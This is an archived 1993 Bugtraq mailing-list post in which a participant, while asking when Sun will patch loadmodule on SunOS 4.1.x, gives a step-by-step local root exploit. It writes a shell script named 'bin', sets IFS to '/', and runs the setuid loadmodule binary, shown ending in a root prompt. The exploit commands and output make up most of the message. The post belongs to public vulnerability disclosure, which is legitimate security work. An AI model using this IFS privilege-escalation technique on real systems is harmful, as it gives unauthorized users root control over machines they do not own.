Bugtraq mailing list archives
Re: IFS hole?
From: kraitch () EECS Berkeley EDU (mark kraitchman)
Date: Wed, 15 Dec 1993 09:49:04 -0800
In Message-Id: <9312151103.AA10103 () ramon bgu ac il> jsz () ramon bgu ac il (Yonathan) writes how to get root using /usr/local/bin/sysinfo (which I don't have) and the IFS bug. What I am wondering, is how long it will be before Sun officially releases the sun4 patch for SunOS 4.1.x loadmodule (100448-02)? I thought the patch was going to be released yesterday? Here is yet another `how-to' example about the importance of IFS in setuid root programs. %cat >~/bin/bin #!/bin/sh sh -i ^D %chmod 755 ~/bin/bin %setenv IFS / %cd ~/bin %/usr/openwin/bin/loadmodule /sys/sun4c/OBJ/evqmod-sun4c.o /etc/openwin/modules/evqload # whoami root
Current thread:
- Re: IFS hole? Yonathan (Dec 15)
- Re: IFS hole? abeckett () fmlrnd co uk (Dec 15)
- <Possible follow-ups>
- Re: IFS hole? mark kraitchman (Dec 15)
- Re: IFS hole? Greg Woods (Dec 15)
- IFS hole? Karyn Pichnarczyk (Dec 15)
- Re: IFS hole? henry strickland (Dec 15)
- Re: IFS hole? Peter shipley (Dec 15)
- Re: IFS hole? Rik Harris (Dec 15)
- Re: IFS hole? Christopher Davis (Dec 17)